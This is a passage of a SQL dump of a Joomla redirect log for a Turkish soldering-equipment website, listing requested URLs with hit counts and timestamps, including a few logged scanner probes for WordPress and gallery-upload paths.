00:00:00',301),(11434,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın?language=en-gb',NULL,'','',252,0,'2017-11-12 20:14:04','0000-00-00 00:00:00',301),(11435,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız?language=en-gb',NULL,'','',249,0,'2017-11-12 20:14:18','0000-00-00 00:00:00',301),(11436,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı?language=en-gb',NULL,'','',250,0,'2017-11-12 20:14:26','0000-00-00 00:00:00',301),(11437,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız?language=en-gb',NULL,'','',250,0,'2017-11-12 20:14:31','0000-00-00 00:00:00',301),(11438,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_name',NULL,'','',370,0,'2017-11-12 20:25:52','0000-00-00 00:00:00',301),(11439,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_sku',NULL,'','',378,0,'2017-11-12 20:26:03','0000-00-00 00:00:00',301),(11440,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',368,0,'2017-11-12 20:26:34','0000-00-00 00:00:00',301),(11441,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',647,0,'2017-11-12 20:27:21','0000-00-00 00:00:00',301),(11442,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,ordering',NULL,'','',556,0,'2017-11-12 20:31:52','0000-00-00 00:00:00',301),(11443,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',550,0,'2017-11-12 20:32:33','0000-00-00 00:00:00',301),(11444,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',526,0,'2017-11-12 20:32:49','0000-00-00 00:00:00',301),(11445,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',545,0,'2017-11-12 20:33:52','0000-00-00 00:00:00',301),(11446,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',581,0,'2017-11-12 20:34:28','0000-00-00 00:00:00',301),(11447,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',320,0,'2017-11-12 20:35:09','0000-00-00 00:00:00',301),(11448,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',296,0,'2017-11-12 20:35:18','0000-00-00 00:00:00',301),(11449,'http://www.3s-technologies.com.tr/en/products/lfs-1-detail?tmpl=component&print=1',NULL,'','',44,0,'2017-11-12 20:35:31','0000-00-00 00:00:00',301),(11450,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,`p`.product_sku',NULL,'','',552,0,'2017-11-12 20:35:43','0000-00-00 00:00:00',301),(11451,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',550,0,'2017-11-12 20:35:57','0000-00-00 00:00:00',301),(11452,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,category_name',NULL,'','',604,0,'2017-11-12 20:36:25','0000-00-00 00:00:00',301),(11453,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',549,0,'2017-11-12 20:36:34','0000-00-00 00:00:00',301),(11454,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,mf_name',NULL,'','',621,0,'2017-11-12 20:37:09','0000-00-00 00:00:00',301),(11455,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',570,0,'2017-11-12 20:37:19','0000-00-00 00:00:00',301),(11456,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',307,0,'2017-11-12 20:38:03','0000-00-00 00:00:00',301),(11457,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/dirdesc',NULL,'','',613,0,'2017-11-12 20:38:16','0000-00-00 00:00:00',301),(11458,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',318,0,'2017-11-12 20:39:09','0000-00-00 00:00:00',301),(11459,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/npm-detail',NULL,'','',333,0,'2017-11-12 20:39:18','0000-00-00 00:00:00',301),(11460,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',329,0,'2017-11-12 20:39:37','0000-00-00 00:00:00',301),(11461,'http://www.3s-technologies.com.tr/en/products/mi-300-detail?tmpl=component&print=1',NULL,'','',38,0,'2017-11-12 20:40:11','0000-00-00 00:00:00',301),(11462,'http://www.3s-technologies.com.tr/en/products/ly-8c-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-12 20:49:32','0000-00-00 00:00:00',301),(11463,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',12,0,'2017-11-12 20:51:36','0000-00-00 00:00:00',301),(11464,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/dirdesc/results,1-5',NULL,'','',2,0,'2017-11-12 21:12:55','0000-00-00 00:00:00',301),(11465,'http://3s-technologies.com.tr/index.php/en/products/cs40-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-12 21:54:05','0000-00-00 00:00:00',301),(11466,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_12_250x250.jpg',NULL,'','',3,0,'2017-11-12 21:54:21','0000-00-00 00:00:00',301),(11467,'http://www.3s-technologies.com.tr/en/products/rh6-detail?tmpl=component&print=1',NULL,'','',33,0,'2017-11-12 21:54:59','0000-00-00 00:00:00',301),(11468,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-12 22:15:27','0000-00-00 00:00:00',301),(11469,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/results,1-10',NULL,'','',4,0,'2017-11-12 23:00:27','0000-00-00 00:00:00',301),(11470,'http://3s-technologies.com.tr/en/products/2.-el-makineler/rh6-detail',NULL,'','',24,0,'2017-11-12 23:05:07','0000-00-00 00:00:00',301),(11471,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/lfs-1-detail',NULL,'','',31,0,'2017-11-12 23:09:48','0000-00-00 00:00:00',301),(11472,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',10,0,'2017-11-12 23:17:11','0000-00-00 00:00:00',301),(11473,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-12 23:27:57','0000-00-00 00:00:00',301),(11474,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,ordering',NULL,'','',6,0,'2017-11-12 23:33:10','0000-00-00 00:00:00',301),(11475,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/mi-300-detail',NULL,'','',26,0,'2017-11-12 23:37:53','0000-00-00 00:00:00',301),(11476,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,mf_name/results,1-50',NULL,'','',5,0,'2017-11-12 23:47:12','0000-00-00 00:00:00',301),(11477,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',16,0,'2017-11-12 23:53:26','0000-00-00 00:00:00',301),(11478,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,category_name?language=en-gb',NULL,'','',16,0,'2017-11-13 00:02:51','0000-00-00 00:00:00',301),(11479,'http://3s-technologies.com.tr/tr/hakkimizda',NULL,'','',51,0,'2017-11-13 00:05:54','0000-00-00 00:00:00',301),(11480,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/sp18_250x250.jpg',NULL,'','',3,0,'2017-11-13 00:14:37','0000-00-00 00:00:00',301),(11481,'http://3s-technologies.com.tr/index.php/en/products/cm-602-l-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-13 00:18:50','0000-00-00 00:00:00',301),(11482,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-13 00:20:06','0000-00-00 00:00:00',301),(11483,'http://www.3s-technologies.com.tr/en/joomla/images/pdf/gf_conveyer_and_batch_reflow_ovens.pdf',NULL,'','',1,0,'2017-11-13 00:31:40','0000-00-00 00:00:00',301),(11484,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/mi-300-detail',NULL,'','',16,0,'2017-11-13 00:38:37','0000-00-00 00:00:00',301),(11485,'http://www.3s-technologies.com.tr/tr/anasayfa/80-turkish-tr/turkish-content',NULL,'','',33,0,'2017-11-13 00:44:26','0000-00-00 00:00:00',301),(11486,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_sku',NULL,'','',37,0,'2017-11-13 00:46:09','0000-00-00 00:00:00',301),(11487,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/results,1-50',NULL,'','',4,0,'2017-11-13 00:57:20','0000-00-00 00:00:00',301),(11488,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,mf_name/dirdesc',NULL,'','',5,0,'2017-11-13 01:06:40','0000-00-00 00:00:00',301),(11489,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/lfs-1-detail',NULL,'','',4,0,'2017-11-13 01:16:01','0000-00-00 00:00:00',301),(11490,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh6-detail',NULL,'','',29,0,'2017-11-13 01:44:04','0000-00-00 00:00:00',301),(11491,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-13 01:48:11','0000-00-00 00:00:00',301),(11492,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/mi-300-detail',NULL,'','',4,0,'2017-11-13 01:53:25','0000-00-00 00:00:00',301),(11493,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-13 02:07:27','0000-00-00 00:00:00',301),(11494,'http://www.3s-technologies.com.tr/en/wp-content/themes/famous/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/famous/style.css','',6,0,'2017-11-13 02:31:24','0000-00-00 00:00:00',301),(11495,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku',NULL,'','',48,0,'2017-11-13 02:35:30','0000-00-00 00:00:00',301),(11496,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,mf_name/results,1-5',NULL,'','',9,0,'2017-11-13 02:40:10','0000-00-00 00:00:00',301),(11497,'http://www.3s-technologies.com.tr/tr/urunler/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',31,0,'2017-11-13 03:08:14','0000-00-00 00:00:00',301),(11498,'http://3s-technologies.com.tr/tr/joomla/index.php',NULL,'','',17,0,'2017-11-13 03:12:40','0000-00-00 00:00:00',301),(11499,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/dirdesc',NULL,'','',42,0,'2017-11-13 03:22:15','0000-00-00 00:00:00',301),(11500,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,mf_name/results,1-5',NULL,'','',3,0,'2017-11-13 03:36:17','0000-00-00 00:00:00',301),(11501,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name?language=tr-tr',NULL,'','',2,0,'2017-11-13 03:44:38','0000-00-00 00:00:00',301),(11502,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-20-detail',NULL,'','',16,0,'2017-11-13 03:45:19','0000-00-00 00:00:00',301),(11503,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-13 04:01:23','0000-00-00 00:00:00',301),(11504,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,mf_name/results,1-50',NULL,'','',4,0,'2017-11-13 04:01:30','0000-00-00 00:00:00',301),(11505,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?`p`.product_sku&language=en-gb',NULL,'','',1,0,'2017-11-13 04:51:48','0000-00-00 00:00:00',301),(11506,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-13 04:55:08','0000-00-00 00:00:00',301),(11507,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-13 05:00:51','0000-00-00 00:00:00',301),(11508,'https://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-13 05:02:38','0000-00-00 00:00:00',301),(11509,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-13 05:05:24','0000-00-00 00:00:00',301),(11510,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_sku/results,1-5',NULL,'','',3,0,'2017-11-13 05:10:20','0000-00-00 00:00:00',301),(11511,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,mf_name/results,1-10',NULL,'','',7,0,'2017-11-13 05:31:31','0000-00-00 00:00:00',301),(11512,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-11-13 05:59:16','0000-00-00 00:00:00',301),(11513,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2017-11-13 07:38:33','0000-00-00 00:00:00',301),(11514,'http://www.3s-technologies.com.tr/tr/urunler/smd-dã¼åÿã¼k-hä±zlä±/cs40-detail',NULL,'','',2,0,'2017-11-13 08:05:19','0000-00-00 00:00:00',301),(11515,'http://3s-technologies.com.tr/tr/urunler/rh6-detail?tmpl=component&print=1',NULL,'','',22,0,'2017-11-13 08:06:58','0000-00-00 00:00:00',301),(11516,'http://www.3s-technologies.com.tr/tr/urunler/avf-detail?tmpl=component&print=1',NULL,'','',40,0,'2017-11-13 08:10:19','0000-00-00 00:00:00',301),(11517,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux/by,mf_name',NULL,'','',1,0,'2017-11-13 08:11:53','0000-00-00 00:00:00',301),(11518,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/results,1-10',NULL,'','',4,0,'2017-11-13 08:15:37','0000-00-00 00:00:00',301),(11519,'http://3s-technologies.com.tr/tr/urunler/manufacturers/panasonic',NULL,'','',59,0,'2017-11-13 08:31:18','0000-00-00 00:00:00',301),(11520,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-13 09:26:04','0000-00-00 00:00:00',301),(11521,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-13 09:30:40','0000-00-00 00:00:00',301),(11522,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/avf-detail',NULL,'','',14,0,'2017-11-13 09:35:05','0000-00-00 00:00:00',301),(11523,'http://3s-technologies.com.tr/index.php/en/products/screen-printer',NULL,'','',33,0,'2017-11-13 09:40:19','0000-00-00 00:00:00',301),(11524,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/results,1-100',NULL,'','',5,0,'2017-11-13 09:45:37','0000-00-00 00:00:00',301),(11525,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',8,0,'2017-11-13 09:50:54','0000-00-00 00:00:00',301),(11526,'http://www.3s-technologies.com.tr/en/products/konveyorler/results,1-50',NULL,'','',4,0,'2017-11-13 10:12:05','0000-00-00 00:00:00',301),(11527,'http://3s-technologies.com.tr/en/products/spr-20-41-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-13 10:31:25','0000-00-00 00:00:00',301),(11528,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/avf-detail?tmpl=component&print=1',NULL,'','',10,0,'2017-11-13 10:38:33','0000-00-00 00:00:00',301),(11529,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-11-13 10:51:55','0000-00-00 00:00:00',301),(11530,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',212,0,'2017-11-13 10:58:17','0000-00-00 00:00:00',301),(11531,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-13 10:59:43','0000-00-00 00:00:00',301),(11532,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/results,1-10',NULL,'','',1,0,'2017-11-13 11:05:01','0000-00-00 00:00:00',301),(11533,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,mf_name',NULL,'','',42,0,'2017-11-13 11:09:32','0000-00-00 00:00:00',301),(11534,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-20-detail',NULL,'','',32,0,'2017-11-13 11:49:45','0000-00-00 00:00:00',301),(11535,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name/results,1-10',NULL,'','',1,0,'2017-11-13 11:52:40','0000-00-00 00:00:00',301),(11536,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name',NULL,'','',44,0,'2017-11-13 12:00:42','0000-00-00 00:00:00',301),(11537,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',657,0,'2017-11-13 12:03:15','0000-00-00 00:00:00',301),(11538,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-13 12:12:01','0000-00-00 00:00:00',301),(11539,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,pc.ordering,product_name',NULL,'','',8,0,'2017-11-13 12:29:43','0000-00-00 00:00:00',301),(11540,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/results,1-10',NULL,'','',3,0,'2017-11-13 12:35:01','0000-00-00 00:00:00',301),(11541,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,mf_name/results,1-5',NULL,'','',5,0,'2017-11-13 12:56:11','0000-00-00 00:00:00',301),(11542,'http://www.3s-technologies.com.tr/en/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'http://www.3s-technologies.com.tr/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',1,0,'2017-11-13 13:00:35','0000-00-00 00:00:00',301),(11543,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-13 13:05:38','0000-00-00 00:00:00',301),(11544,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,product_name',NULL,'','',41,0,'2017-11-13 13:06:47','0000-00-00 00:00:00',301),(11545,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-13 13:27:09','0000-00-00 00:00:00',301),(11546,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',6,0,'2017-11-13 13:38:11','0000-00-00 00:00:00',301),(11547,'http://www.3s-technologies.com.tr/tr//wp-includes/wlwmanifest.xml',NULL,'','',11,0,'2017-11-13 13:41:50','0000-00-00 00:00:00',301),(11548,'http://www.3s-technologies.com.tr/tr//xmlrpc.php?rsd',NULL,'','',11,0,'2017-11-13 13:41:50','0000-00-00 00:00:00',301),(11549,'http://www.3s-technologies.com.tr/tr//blog/wp-includes/wlwmanifest.xml',NULL,'','',11,0,'2017-11-13 13:41:51','0000-00-00 00:00:00',301),(11550,'http://www.3s-technologies.com.tr/tr//wordpress/wp-includes/wlwmanifest.xml',NULL,'','',11,0,'2017-11-13 13:41:51','0000-00-00 00:00:00',301),(11551,'http://www.3s-technologies.com.tr/tr//wp/wp-includes/wlwmanifest.xml',NULL,'','',11,0,'2017-11-13 13:41:51','0000-00-00 00:00:00',301),(11552,'http://www.3s-technologies.com.tr/tr//site/wp-includes/wlwmanifest.xml',NULL,'','',11,0,'2017-11-13 13:41:51','0000-00-00 00:00:00',301),(11553,'http://www.3s-technologies.com.tr/tr//cms/wp-includes/wlwmanifest.xml',NULL,'','',11,0,'2017-11-13 13:41:51','0000-00-00 00:00:00',301),(11554,'http://www.3s-technologies.com.tr/en/products/screen-printer/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-13 14:06:50','0000-00-00 00:00:00',301),(11555,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,product_sku',NULL,'','',58,0,'2017-11-13 14:20:46','0000-00-00 00:00:00',301),(11556,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name',NULL,'','',57,0,'2017-11-13 14:20:48','0000-00-00 00:00:00',301),(11557,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,category_name',NULL,'','',43,0,'2017-11-13 14:20:51','0000-00-00 00:00:00',301),(11558,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',212,0,'2017-11-13 14:20:53','0000-00-00 00:00:00',301),(11559,'http://www.3s-technologies.com.tr/tr/urunler/rh2-20-detail?tmpl=component&print=1',NULL,'','',36,0,'2017-11-13 14:20:56','0000-00-00 00:00:00',301),(11560,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name/results,1-50',NULL,'','',1,0,'2017-11-13 14:42:14','0000-00-00 00:00:00',301),(11561,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-20',NULL,'','',1,0,'2017-11-13 14:50:04','0000-00-00 00:00:00',301),(11562,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,mf_name',NULL,'','',42,0,'2017-11-13 14:54:03','0000-00-00 00:00:00',301),(11563,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/results,1-50',NULL,'','',4,0,'2017-11-13 15:05:50','0000-00-00 00:00:00',301),(11564,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_name/dirdesc',NULL,'','',4,0,'2017-11-13 15:35:21','0000-00-00 00:00:00',301),(11565,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/images/stories/virtuemart/product/img2686-copy.jpg',NULL,'','',35,0,'2017-11-13 15:45:04','0000-00-00 00:00:00',301),(11566,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri',NULL,'','',19,0,'2017-11-13 15:48:06','0000-00-00 00:00:00',301),(11567,'http://www.3s-technologies.com.tr/en/products/konveyorler/results,1-20',NULL,'','',4,0,'2017-11-13 15:53:03','0000-00-00 00:00:00',301),(11568,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-13 15:53:17','0000-00-00 00:00:00',301),(11569,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim',NULL,'','',13,0,'2017-11-13 16:01:11','0000-00-00 00:00:00',301),(11570,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın',NULL,'','',214,0,'2017-11-13 16:04:51','0000-00-00 00:00:00',301),(11571,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,mf_name/results,1-5',NULL,'','',9,0,'2017-11-13 16:16:40','0000-00-00 00:00:00',301),(11572,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-13 16:22:34','0000-00-00 00:00:00',301),(11573,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,ordering?language=en-gb',NULL,'','',24,0,'2017-11-13 16:28:27','0000-00-00 00:00:00',301),(11574,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-100',NULL,'','',2,0,'2017-11-13 16:28:28','0000-00-00 00:00:00',301),(11575,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,category_name',NULL,'','',26,0,'2017-11-13 17:03:21','0000-00-00 00:00:00',301),(11576,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux',NULL,'','',138,0,'2017-11-13 17:09:40','0000-00-00 00:00:00',301),(11577,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',235,0,'2017-11-13 17:16:35','0000-00-00 00:00:00',301),(11578,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',42,0,'2017-11-13 17:19:19','0000-00-00 00:00:00',301),(11579,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,category_name',NULL,'','',26,0,'2017-11-13 17:27:28','0000-00-00 00:00:00',301),(11580,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_sku/results,1-10',NULL,'','',6,0,'2017-11-13 17:33:23','0000-00-00 00:00:00',301),(11581,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-10',NULL,'','',4,0,'2017-11-13 17:45:11','0000-00-00 00:00:00',301),(11582,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-13 17:47:51','0000-00-00 00:00:00',301),(11583,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-5',NULL,'','',3,0,'2017-11-13 17:51:05','0000-00-00 00:00:00',301),(11584,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_sku?language=en-gb',NULL,'','',7,0,'2017-11-13 17:55:15','0000-00-00 00:00:00',301),(11585,'http://www.3s-technologies.com.tr/index.php/en/products/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-13 17:55:31','0000-00-00 00:00:00',301),(11586,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/results,1-5',NULL,'','',7,0,'2017-11-13 17:56:59','0000-00-00 00:00:00',301),(11587,'http://www.3s-technologies.com.tr/tr/urunler/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-13 18:02:53','0000-00-00 00:00:00',301),(11588,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_name',NULL,'','',39,0,'2017-11-13 18:14:41','0000-00-00 00:00:00',301),(11589,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_name/results,1-5',NULL,'','',5,0,'2017-11-13 18:20:35','0000-00-00 00:00:00',301),(11590,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/by,ordering',NULL,'','',595,0,'2017-11-13 18:32:23','0000-00-00 00:00:00',301),(11591,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering?language=en-gb',NULL,'','',3,0,'2017-11-13 18:36:20','0000-00-00 00:00:00',301),(11592,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',5,0,'2017-11-13 18:44:11','0000-00-00 00:00:00',301),(11593,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-10',NULL,'','',1,0,'2017-11-13 18:50:06','0000-00-00 00:00:00',301),(11594,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku',NULL,'','',3,0,'2017-11-13 18:56:00','0000-00-00 00:00:00',301),(11595,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-40',NULL,'','',5,0,'2017-11-13 19:01:16','0000-00-00 00:00:00',301),(11596,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',692,0,'2017-11-13 19:26:26','0000-00-00 00:00:00',301),(11597,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-10',NULL,'','',4,0,'2017-11-13 19:37:18','0000-00-00 